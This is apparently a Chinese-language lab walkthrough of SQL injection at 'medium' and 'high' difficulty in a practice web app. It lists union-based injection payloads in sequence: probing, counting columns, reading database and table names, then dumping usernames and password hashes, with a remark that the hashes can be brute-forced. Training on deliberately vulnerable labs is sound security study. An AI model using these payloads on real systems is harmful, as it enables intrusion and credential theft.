medium 

（1）判断注入是字符型还是数值型

数值型，获得了用户信息。

id =1 or 1=1

（2）查询字段数

为3时报错，代表字段数为2。

1 order by 3

（3）显示字段顺序

1 union select 1,2

（4）获取当前数据库名

1 union select 1, database() #

 

(5)获取当前数据库的表名

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

（6）获取数据

结果可以使用md5进行爆破

1 union select user,password from users

high

查看源代码，增加了一个limit 1，使用#注释，其他操作不变。